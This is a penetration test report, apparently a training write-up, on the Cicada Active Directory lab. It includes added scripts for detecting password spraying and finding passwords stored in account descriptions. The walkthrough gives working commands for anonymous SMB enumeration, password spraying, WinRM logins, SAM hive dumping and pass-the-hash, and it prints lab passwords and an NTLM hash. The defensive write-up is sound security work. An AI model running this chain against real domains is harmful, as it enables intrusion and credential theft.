Penetration Testing Report - Cicada
[email protected]
Netanel Rubinov
Date: 23/12/2024
Copyright © 2024 ITSafe Ltd. All rights reserved.
No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any
broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without
prior written permission from ITSAFE Cyber College.
Executive Summary
Introduction
Penetration testing of the Windows infrastructure was conducted to evaluate the system's
security posture. This assessment, carried out by ITSafe, was a gray-box security audit
intended to assess the infrastructure's resilience against potential attacks and to identify
areas for improving data protection.
Scope
Finding Classification
Severity
The finding’s severity relates to the impact which might be inflicted to the organization
due to that finding. The severity level can be one of the following options, and is
determined by the specific attack scenario:
Critical – Critical level findings may cause significant business damage to the organization,
such as:
● Significant data leakage
● Denial of Service to essential systems
● Gaining control of the organization’s resources (For example Servers,
Routers, etc.)
High – High-level findings may cause damage to the organization, such as:
● Data leakage
● Execution of unauthorized actions
● Insecure communication
● Denial of Service
● Bypassing security mechanisms
● Inflicting various business damage
Medium – Medium-level findings may increase the probability of an attack succeeding or
cause a small amount of damage to the organization, such as:
● Discoveries that make it easier to conduct other attacks
● Findings that may increase the amount of damage an attacker can inflict once they
have carried out a successful attack
● Findings which may inflict a low level of damage to the organization
Low – Low-level findings may inflict a marginal cost on the organization, or assist the
attacker when performing an attack, such as:
● Providing the attacker with valuable information to help plan the attack
● Findings that may inflict marginal damage to the organization
● Results that may slightly help the attacker when carrying out an attack, or in
remaining undetected
Informative – Informative findings are findings without any information security impact.
However, they are still brought to the attention of the organization.
Conclusions
During the penetration test, 4 security vulnerabilities were identified (two rated High and
two rated Medium).
From our professional perspective, the overall security level of the system is Medium-High.
Anonymous SMB access exposed the list of domain users and a default password; further
passwords were left in plaintext in a share, in a backup script and in the description
attribute of an AD user object; and nothing prevented those passwords from being sprayed
across the enumerated accounts. Chained together, these issues led from an unauthenticated
network position to Domain Administrator access.
Identified Vulnerabilities
Item | Test Type | Risk Level | Topic | General Explanation | Status
1 | Infrastructure | High | Username spraying (SMB access) | The system is exposed to enumeration and brute-force attacks on SMB services, allowing unauthorized access to shared resources. | Vulnerable
2 | Infrastructure | High | Plaintext credentials | Plaintext credentials refers to a situation where access details such as passwords and usernames are stored or transmitted in an unencrypted form. This presents a high security risk, as any party with access to the information can read and use the credentials. | Vulnerable
3 | Infrastructure | Medium | Information Disclosure | Information disclosure (enumeration) occurs when an attacker gains unauthorized access to sensitive system information, such as valid usernames, shared resources, or system configurations, which can be exploited for further attacks. | Vulnerable
4 | Infrastructure | Medium | Improper Remote Access Configuration | The described situation indicates an insecure remote access configuration on the system, allowing unauthorized parties to connect and retrieve sensitive files such as the SAM and SYSTEM hives. | Vulnerable
Walkthrough
Using Nmap to scan the target machine for open ports and services (-A already implies
-sC and -sV, so those extra flags are redundant but harmless):
“nmap -p- -A -sC -sV -T4 10.10.11.35”
● This revealed several open ports and services, including SMB (445) and Kerberos
(88). Kerberos alongside SMB points to an Active Directory domain controller, and
anonymous SMB access was the first thing to test.
Explored the SMB service with the following command, which showed that anonymous
(null-session) share listing was allowed:
“smbclient -L //10.10.11.35 -N”
● Result: Several shares were listed, including HR.
Access to SMB Share:
Using smbclient to connect to the HR share anonymously:
“smbclient //10.10.11.35/HR --user anonymous -N”
After transferring the file “Notice from HR.txt” to my Kali machine and opening it, I found
a note containing the default password issued to users.
Brute-Force User Enumeration:
Using nxc (NetExec) to enumerate domain accounts by RID cycling over the anonymous SMB
session:
“nxc smb 10.10.11.35 -u 'anonymous' -p '' --rid-brute”
● Result: Identified several potential users within the Active Directory domain.
Extracting AD Users:
Filtered the RID-cycling output (here saved to a file named rid_brute.txt) down to domain
user names. The input and output files must differ: redirecting into the same file that is
being read truncates it before grep runs.
“grep SidTypeUser rid_brute.txt | grep -o 'CICADA\\[^ ]*' | awk -F'\\' '{print $2}' > users.txt”
● Result: Extracted a list of domain users, providing a list of targets for password
guessing.
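The extraction step above is fragile: the original one-liner read and wrote the same file, and it kept groups and machine accounts. The script below is an added example (not part of the original report) that does the same job more safely: it filters --rid-brute output down to SidTypeUser objects, strips the DOMAIN\ prefix, drops machine accounts (names ending in $) and deduplicates. The sample lines embedded in it are constructed to mimic NetExec's output format; the host name CICADA-DC and the RIDs are assumed.

```shell
#!/usr/bin/env bash
# Added example, not from the original report: convert NetExec --rid-brute
# output into a clean list of domain user names for password spraying.
set -eu

# Constructed sample of `nxc smb <target> -u anonymous -p '' --rid-brute`
# output. Host name CICADA-DC and the RIDs are assumed; the trailing
# "RID: DOMAIN\name (SidType...)" shape is what the tool prints.
SAMPLE_RID_BRUTE='SMB  10.10.11.35  445  CICADA-DC  500: CICADA\Administrator (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  501: CICADA\Guest (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  502: CICADA\krbtgt (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  512: CICADA\Domain Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  513: CICADA\Domain Users (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1104: CICADA\michael.wrightson (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1105: CICADA\david.orelious (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1106: CICADA\emily.oscars (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1106: CICADA\emily.oscars (SidTypeUser)'

# rid_brute_to_users: stdin = raw --rid-brute output, stdout = one user per line.
# Keeps only user objects, strips "DOMAIN\", drops machine accounts (trailing $)
# and deduplicates. Reading stdin and writing stdout avoids the report's
# mistake of redirecting into the same file that is being read.
rid_brute_to_users() {
  grep 'SidTypeUser' \
    | sed -n 's/.*: [^\\]*\\\(.*\) (SidTypeUser).*/\1/p' \
    | grep -v '\$$' \
    | LC_ALL=C sort -u
}

# count_users: number of candidate accounts produced from stdin.
count_users() {
  rid_brute_to_users | wc -l | tr -d ' '
}

# Stand-alone demo on the constructed sample. Against a live target:
#   nxc smb 10.10.11.35 -u anonymous -p '' --rid-brute | rid_brute_to_users > users.txt
printf '%s\n' "$SAMPLE_RID_BRUTE" | rid_brute_to_users
```

Groups are dropped because they cannot be sprayed, and machine accounts are dropped because their passwords are long random values that a human-chosen default will never match; keeping them only adds noise (and failed-logon events) to the spray.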
Password Spraying over SMB:
Sprayed the password from the HR notice against every enumerated user
(--continue-on-success keeps going after the first hit instead of stopping):
“nxc smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success”
● Result: Successful authentication as michael.wrightson. Enumerating domain users with
michael.wrightson's credentials revealed another password stored in the description
attribute of the user david.orelious.
Accessing Shares Using Credentials:
Connected to the DEV share using david.orelious' credentials:
“smbclient //10.10.11.35/DEV --user david.orelious”
● Result: Gained access to another directory containing further files.
Inspecting the PowerShell script found there (Backup_script.ps1), I found a credential
for the user emily.oscars.
Access via WinRM:
Successfully authenticated via WinRM using emily.oscars' credentials:
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
● Result: Obtained command-line access to the target system and found the user’s
flag.
Privilege Escalation:
From the WinRM session, saved the SAM and SYSTEM registry hives to C:\Temp with reg save,
then pulled them back with evil-winrm's download command (saving these hives requires
administrative rights or SeBackupPrivilege on the account):
“reg save hklm\sam C:\Temp\SAM”
“reg save hklm\system C:\Temp\SYSTEM”
“download C:\Temp\SAM”
“download C:\Temp\SYSTEM”
● Result: Obtained the hives needed for offline hash extraction.
Hash Extraction Using Impacket:
Ran impacket-secretsdump to extract credentials from the SAM and SYSTEM files:
“impacket-secretsdump -sam SAM -system SYSTEM LOCAL”
● Result: Retrieved password hashes for the Administrator account.
Final Access
Administrator Access:
Used the extracted NTLM hash to authenticate as Administrator (pass-the-hash; evil-winrm's
-H option takes the NT hash in place of a password):
evil-winrm -i 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
● Result: Gained Domain Administrator access.
Finding Details:
Password spraying
Severity: High | Probability: High
Vulnerability description:
The system is exposed to enumeration and brute-force attacks on SMB services, allowing
unauthorized access to shared resources. Without sufficient protections such as account
lockout policies or strong authentication mechanisms, attackers can repeatedly attempt
login combinations, potentially revealing valid credentials. This vulnerability can lead to
unauthorized access to sensitive data and increase the risk of exploitation. Below is a
detailed description of the steps taken to exploit this weakness.
Vulnerability Detail:
I conducted a password spraying attack with NetExec, using the usernames collected during
enumeration and the single password found in the shared HR file, and identified that the
password belonged to the user michael.wrightson.
I repeated the spray with the password found in an object's description attribute (located
by querying LDAP) and found that it belonged to the user david.orelious.
Mitigations:
Account Lockout Policy: An account lockout policy should be configured to lock
accounts after a certain number of failed login attempts. This slows down or blocks
spraying over SMB and limits the damage caused by unauthorized login attempts. Note
that spraying is designed to stay under the lockout threshold by trying one password
per account, so the policy must be paired with detection that correlates failures across
accounts, and the threshold should be set so that an attacker cannot trivially lock out
every user.
Monitoring: The system should be actively monitored for unauthorized connection
attempts. Failed-logon events on the domain controller (4625, 4776 for NTLM
validation, 4771 for Kerberos pre-authentication) should be collected, and an IDS/IPS or
SIEM rule should alert when one source fails against many distinct accounts in a short
period.
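Lockout thresholds alone do not stop spraying, because the attacker deliberately tries one password across many accounts to stay under the threshold. What gives it away is one source address failing against many distinct accounts in a short period. The script below is an added example (not part of the original report) of that correlation over constructed, CSV-shaped logon records (timestamp, event ID, target account, source IP, status code), of the kind a SIEM export of Security log events 4625 and 4624 would produce; the field layout, IP addresses and timestamps are assumed.

```shell
#!/usr/bin/env bash
# Added example, not from the original report: flag password spraying by
# correlating Windows logon events per source IP. Input rows are constructed
# and CSV-shaped: timestamp,event_id,target_user,source_ip,status.
# 4625 = failed logon, 4624 = successful logon; 0xC000006A = wrong password.
set -eu

# Constructed sample: 10.10.14.5 tries one password against six accounts and
# then logs on as michael.wrightson; 10.10.20.7 is a user mistyping their own
# password twice before succeeding. IPs and timestamps are assumed.
SAMPLE_LOGONS='2024-12-23T10:00:01,4625,michael.wrightson,10.10.14.5,0xC000006A
2024-12-23T10:00:01,4625,david.orelious,10.10.14.5,0xC000006A
2024-12-23T10:00:02,4625,emily.oscars,10.10.14.5,0xC000006A
2024-12-23T10:00:02,4625,Administrator,10.10.14.5,0xC000006A
2024-12-23T10:00:03,4625,Guest,10.10.14.5,0xC000006A
2024-12-23T10:00:03,4625,krbtgt,10.10.14.5,0xC000006A
2024-12-23T10:00:04,4624,michael.wrightson,10.10.14.5,0x0
2024-12-23T10:05:10,4625,david.orelious,10.10.20.7,0xC000006A
2024-12-23T10:05:15,4625,david.orelious,10.10.20.7,0xC000006A
2024-12-23T10:05:21,4624,david.orelious,10.10.20.7,0x0'

# detect_spray THRESHOLD: read rows on stdin and print one line per source IP
# whose failed logons hit at least THRESHOLD distinct accounts (default 5).
# A lockout policy counts failures per account; this counts accounts per
# source, which is the dimension spraying stands out on. The successful-logon
# count tells the responder whether the spray actually found a password.
detect_spray() {
  local threshold="${1:-5}"
  awk -F, -v t="$threshold" '
    $2 == "4625" {
      if (!(($4, $3) in seen)) { seen[$4, $3] = 1; distinct[$4]++ }
      failed[$4]++
    }
    $2 == "4624" { success[$4]++ }
    END {
      for (ip in distinct)
        if (distinct[ip] >= t)
          printf "%s distinct_accounts=%d failed_logons=%d successful_logons=%d\n",
                 ip, distinct[ip], failed[ip], success[ip] + 0
    }' | sort
}

# Stand-alone demo on the constructed sample.
printf '%s\n' "$SAMPLE_LOGONS" | detect_spray 5
```

The user at 10.10.20.7 is never flagged because all of their failures are against a single account, which is exactly the case a per-account lockout counter already handles. Kerberos pre-authentication failures are logged as 4771 and NTLM validation on the domain controller as 4776 rather than 4625, so those events need the same per-source correlation, and in production the count should be windowed by time rather than over a whole export.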
----------------------------------------------------------------------------------------------------------------------------------
Plaintext credentials
Severity: High | Probability: High
Vulnerability description:
Plaintext Credentials refers to a situation where access details such as passwords and
usernames are stored or transmitted in an unencrypted form. This presents a high security
risk, as any party with access to the information can read and use the credentials.
Vulnerability Detail:
After identifying the shared drives and folders, I attempted an anonymous connection. Upon
successfully connecting, I discovered the file “Notice from HR.txt”, which I downloaded to
my machine. Inside the file, I found a password for one of the users.
After connecting to LDAP with the credentials I had found, I ran queries with ldapsearch and
tried various searches against the directory. In one of them, I searched for the word
"PASSWORD" in the returned data and found that someone had left it in the description
attribute of a user object, revealing another password.
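Passwords left in account descriptions are readable by every authenticated domain user, so defenders can run the same search the tester did. The script below is an added example (not part of the original report): it scans ldapsearch-style LDIF output for entries whose description mentions a password, re-joining the wrapped continuation lines ldapsearch emits so that a secret split across a wrap boundary is not missed. The LDIF embedded in it is constructed; the DNs, the DC=cicada,DC=local suffix and the placeholder password Example-Pass-123! are assumed and are not the values found during the test.

```shell
#!/usr/bin/env bash
# Added example, not from the original report: find AD accounts whose
# description attribute looks like it carries a password. Input is LDIF as
# produced by ldapsearch (one entry per paragraph, long values wrapped onto
# continuation lines that start with a single space).
set -eu

# Constructed LDIF. DNs, the DC=cicada,DC=local suffix and the placeholder
# password are assumed; the long description is wrapped as ldapsearch does.
SAMPLE_LDIF='dn: CN=Michael Wrightson,CN=Users,DC=cicada,DC=local
sAMAccountName: michael.wrightson
description: Helpdesk

dn: CN=David Orelious,CN=Users,DC=cicada,DC=local
sAMAccountName: david.orelious
description: Temp pwd: Example-Pa
 ss-123!

dn: CN=Emily Oscars,CN=Users,DC=cicada,DC=local
sAMAccountName: emily.oscars
description: Backup operator

# search result
search: 2
result: 0 Success'

# find_creds_in_descriptions: stdin = LDIF, stdout = "sAMAccountName: description"
# for every entry whose description mentions pass/pwd/cred (case-insensitive).
# Continuation lines are re-joined first so a password split across a wrap
# boundary is not missed. Entries without sAMAccountName (search summary,
# comments) are skipped.
find_creds_in_descriptions() {
  awk '
    BEGIN { RS = ""; FS = "\n" }
    {
      n = 0
      for (i = 1; i <= NF; i++) {
        if (substr($i, 1, 1) == " ")        # LDIF continuation line
          line[n] = line[n] substr($i, 2)
        else
          line[++n] = $i
      }
      sam = ""; desc = ""
      for (i = 1; i <= n; i++) {
        if (index(line[i], "sAMAccountName: ") == 1) sam = substr(line[i], 17)
        else if (index(line[i], "description: ") == 1) desc = substr(line[i], 14)
      }
      if (sam != "" && tolower(desc) ~ /pass|pwd|cred/) print sam ": " desc
      split("", line)                       # reset for the next entry
    }'
}

# Stand-alone demo on the constructed sample. Against a live domain the same
# data comes from ldapsearch (bind DN and base are assumed here), or from
# `nxc smb <target> -u <user> -p <pass> --users`, which prints descriptions too:
#   ldapsearch -x -H ldap://10.10.11.35 -D "user@cicada.local" -w "$PASS" \
#     -b "DC=cicada,DC=local" "(objectClass=user)" sAMAccountName description \
#     | find_creds_in_descriptions
printf '%s\n' "$SAMPLE_LDIF" | find_creds_in_descriptions
```

Values that ldapsearch prints with a double colon (description:: ...) are base64-encoded and are skipped by this scanner, so decode them first. The keyword list is deliberately short; a real audit should also review descriptions by eye for anything that looks like a secret.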
After finding the login details for the user david.orelious, I connected via SMB and
discovered a file named Backup_script.ps1. This file contained the username and password
of the user emily.oscars in cleartext.
Authenticating as emily.oscars over WinRM, I found the user.txt file containing the first
flag on her Desktop.
Mitigations:
Remove credentials from shared files and directory attributes: Passwords must not be
stored in share contents (such as HR notices or backup scripts) or in the description
attribute of AD objects, which every authenticated domain user can read. Scripts that
need credentials should use a managed service account or a secrets vault rather than an
embedded password.
Rotate the exposed credentials: Every password recovered during this test (the default
password from the HR notice and the passwords of david.orelious and emily.oscars)
should be changed, and the practice of issuing one shared default password to new users
should be replaced with unique initial passwords that must be changed at first logon.
Audit regularly: Periodically search shares and AD attributes for credential material so
that this kind of leak is found before an attacker finds it.
Information Disclosure
Severity: Medium | Probability: High
Vulnerability Description:
Information Disclosure (Enumeration) occurs when an attacker gains unauthorized access
to sensitive system information, such as valid usernames, shared resources, or system
configurations, which can be exploited for further attacks. For example, using SMB, an
attacker may enumerate shared folders or user accounts. This type of vulnerability arises
when systems provide excessive details in error messages or poorly configured access
controls, allowing attackers to gather crucial information.
Vulnerability Details:
Enumeration was the first step in the test. To discover which ports are open and which
services exist, I scanned with Nmap:
“nmap -p- -A -sC -sV -T4 10.10.11.35”
I then listed the shared folders on the SMB server, which succeeded without credentials:
“smbclient -L //10.10.11.35 -N”
After discovering the password in the HR file, I enumerated the existing users with NetExec
over SMB, by RID cycling from the anonymous session:
“nxc smb 10.10.11.35 -u 'anonymous' -p '' --rid-brute”
Mitigation:
Disable Anonymous SMB Access: Block null sessions and unauthenticated enumeration by
disabling the Guest account and enforcing the policies “Network access: Do not allow
anonymous enumeration of SAM accounts and shares” and “Network access: Allow anonymous
SID/Name translation” (set to disabled); anonymous SID-to-name lookup is what RID
cycling relies on.
Restrict SMB Shares: Use ACLs to limit access to shared folders and avoid storing
sensitive data (e.g., passwords) in shared locations. Regularly audit SMB shares for
unauthorized access.
------------------------------------------------------------------------------------------------------------------------
Improper Remote Access Configuration
Severity: Medium | Probability: Medium
Vulnerability description:
The account emily.oscars, whose credentials were recovered from a shared script, was
permitted to log on remotely over WinRM and, from that session, to save the SAM and
SYSTEM registry hives, which hold the local account password hashes and the boot key
needed to decrypt them. Saving these hives requires administrative rights or
SeBackupPrivilege, so the account held more privilege than a regular user needs. Tools
such as evil-winrm are not the weakness; they simply use the remote management access
and privileges that the account had been granted.
Vulnerability Detail:
These files contain sensitive information, including password hashes. Using
impacket-secretsdump, I extracted the NTLM hash of the Administrator account from the
saved hives. This increases the security risk, because an attacker holding the hash can
authenticate without knowing the password. The issue indicates insufficient access
controls and privilege assignment around sensitive data and user credentials.
I connected to the Administrator account using the NTLM hash (pass-the-hash) and found
the last flag on the Administrator's Desktop.
Mitigation:
Limit or disable the WinRM service if it is not needed; otherwise restrict it to HTTPS,
limit membership of the Remote Management Users group to administrators who need it, and
restrict the listener with the host firewall to designated management hosts.
Review privilege assignment: SeBackupPrivilege (granted through the Backup Operators
group) lets any holder read the SAM and SYSTEM hives regardless of file ACLs, so
membership should be limited to accounts that actually run backups. Rotate the
Administrator password, since its hash was exposed.